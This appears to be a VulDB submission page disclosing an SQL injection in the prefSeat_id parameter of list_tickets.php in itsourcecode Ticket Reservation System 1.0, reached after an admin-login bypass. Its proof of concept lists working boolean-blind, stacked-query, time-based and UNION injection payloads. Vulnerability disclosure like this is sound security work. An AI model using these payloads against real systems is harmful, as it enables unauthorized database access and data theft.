Submeter #383645: itsourcecode Ticket Reservation System 1.0 SQLi list_tickets.phpinformação

Título	itsourcecode Ticket Reservation System 1.0 SQLi list_tickets.php
Descrição	By exploiting a universal password vulnerability to log into the admin backend, an SQL injection vulnerability occurs on the "list_tickets.php" page due to the lack of strict filtering of the "prefSeat_id" parameter. ——————————POC—————————— Parameter: prefSeat_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: prefSeat_id=' AND 9743=(SELECT (CASE WHEN (9743=9743) THEN 9743 ELSE (SELECT 7512 UNION SELECT 5594) END))-- - Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: prefSeat_id=';SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: prefSeat_id=' AND (SELECT 2268 FROM (SELECT(SLEEP(5)))jjeF)-- bjxX Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: prefSeat_id=' UNION ALL SELECT NULL,NULL,CONCAT(0x7178626b71,0x4f45474f5268585a684e556354784d73584c486f4e6f42624e4e4d62774971414d41497569624e46,0x71627a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Fonte	⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE10-3.md
Utilizador	Dee.Mirage (UID 71702)
Submissão	31/07/2024 07h24 (há 2 anos)
Moderação	02/08/2024 23h43 (3 days later)
Estado	Aceite
Entrada VulDB	273531 [itsourcecode Ticket Reservation System 1.0 list_tickets.php prefSeat_id Injeção SQL]
Pontos	20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!